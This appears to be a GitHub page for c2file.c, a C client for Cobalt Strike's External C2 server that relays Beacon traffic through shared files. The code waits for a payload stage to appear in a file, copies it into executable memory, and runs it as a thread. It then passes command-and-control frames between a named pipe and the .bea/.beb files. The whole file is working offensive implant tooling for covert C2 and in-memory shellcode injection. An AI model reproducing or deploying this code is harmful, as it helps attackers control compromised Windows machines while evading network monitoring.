-
Notifications
You must be signed in to change notification settings - Fork 31
/
Copy pathc2file.c
169 lines (145 loc) · 4.4 KB
/
c2file.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
/* a quick-client for Cobalt Strike's External C2 server mostly code from @armitagehacker */
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#include <sys/stat.h>
#define PAYLOAD_MAX_SIZE 512 * 1024
#define BUFFER_MAX_SIZE 1024 * 1024
/* read a frame from a handle */
DWORD read_frame(HANDLE my_handle, char * buffer, DWORD max) {
DWORD size = 0, temp = 0, total = 0;
/* read the 4-byte length */
ReadFile(my_handle, (char * ) & size, 4, & temp, NULL);
/* read the whole thing in */
while (total < size) {
Sleep(3000);
ReadFile(my_handle, buffer + total, size - total, & temp, NULL);
total += temp;
}
return size;
}
/* write a frame to a file */
void write_frame(HANDLE my_handle, char * buffer, DWORD length) {
DWORD wrote = 0;
WriteFile(my_handle, (void * ) & length, 4, & wrote, NULL);
WriteFile(my_handle, buffer, length, & wrote, NULL);
}
HANDLE start_beacon(char * payload, DWORD length){
/* inject the payload stage into the current process */
char * payloadE = VirtualAlloc(0, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(payloadE, payload, length);
printf("Injecting Code, %d bytes\n", length);
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) payloadE, (LPVOID) NULL, 0, NULL);
/*
* connect to our Beacon named pipe */
HANDLE handle_beacon = INVALID_HANDLE_VALUE;
while (handle_beacon == INVALID_HANDLE_VALUE) {
handle_beacon = CreateFileA("\\\\.\\pipe\\foobar",
GENERIC_READ | GENERIC_WRITE,
0, NULL, OPEN_EXISTING, SECURITY_SQOS_PRESENT | SECURITY_ANONYMOUS, NULL);
}
return(handle_beacon);
}
void put_file(char *fout,char *data, DWORD length){
FILE *fo;
fo = fopen(fout,"wb");
fwrite(data, length, 1, fo);
fclose(fo);
}
int pop_file(char *fin,char *data, DWORD max){
FILE *fi;
unsigned long fileLen;
fi = fopen(fin, "rb");
if (!fi){
fprintf(stderr, "Unable to open file %s\n", fin);
return(-1);
}
fseek(fi, 0, SEEK_END);
fileLen=ftell(fi);
fseek(fi, 0, SEEK_SET);
if(fileLen+1 > max){
fprintf(stderr, "Memory error!");
fclose(fi);
return(-1);
}
fread(data, fileLen, 1, fi);
fclose(fi);
return(fileLen);
}
off_t fsize(const char *filename) {
struct stat st;
if (stat(filename, &st) == 0)
return st.st_size;
return -1;
}
/* the main logic for our client */
void go(char * name) {
/* xychix ask server for stage */
/* xychix prepare stage for sending */
/*
* connect to the External C2 server */
char fout[128];
char fin[128];
int len;
sprintf(fout, "%s.bea", name);
sprintf(fin, "%s.beb", name);
put_file(fout,"go",2);
while( fsize(fin) <= 0 ){
Sleep( 2000 );
}
Sleep( 10000 );
char * srvpayload = malloc(PAYLOAD_MAX_SIZE);
int srvpayloadLen = pop_file(fin,srvpayload,PAYLOAD_MAX_SIZE-1);
put_file(fin,"",0);
HANDLE handle_beacon = start_beacon(srvpayload, srvpayloadLen);
/* setup our buffer */
char * buffer = (char * ) malloc(BUFFER_MAX_SIZE);
/*
* relay frames back and forth */
while (TRUE) {
/* read from our named pipe Beacon */
DWORD read = read_frame(handle_beacon, buffer,BUFFER_MAX_SIZE);
if (read < 0) {
break;
}else{
printf("got %d bytes from pipe\n",read);
}
/* write to the External C2 server */
//send_frame(socket_extc2, buffer, read);
if(read > 1) {
printf("writing %d bytes\n",read);
put_file(fout,buffer,read);
}
/* read from the External C2 server */
int size_beb = fsize(fin);
if( size_beb > 0){
printf("%d bytes waiting\n",size_beb);
read = pop_file(fin, buffer, BUFFER_MAX_SIZE);
if (read < 0) {
break;
}else{
put_file(fin,"",0);
}
}
/* write to our named pipe Beacon */
write_frame(handle_beacon, buffer, read);
Sleep(300);
}
/* close our handles */
CloseHandle(handle_beacon);
}
void main(DWORD argc, char * argv[]) {
/* check our arguments */
if (argc != 2) {
printf("%s [name]\n", argv[0]);
exit(1);
}
/* initialize winsock */
WSADATA wsaData;
WORD wVersionRequested;
wVersionRequested = MAKEWORD(2, 2);
WSAStartup(wVersionRequested, & wsaData);
/* start our client */
go(argv[1]);
}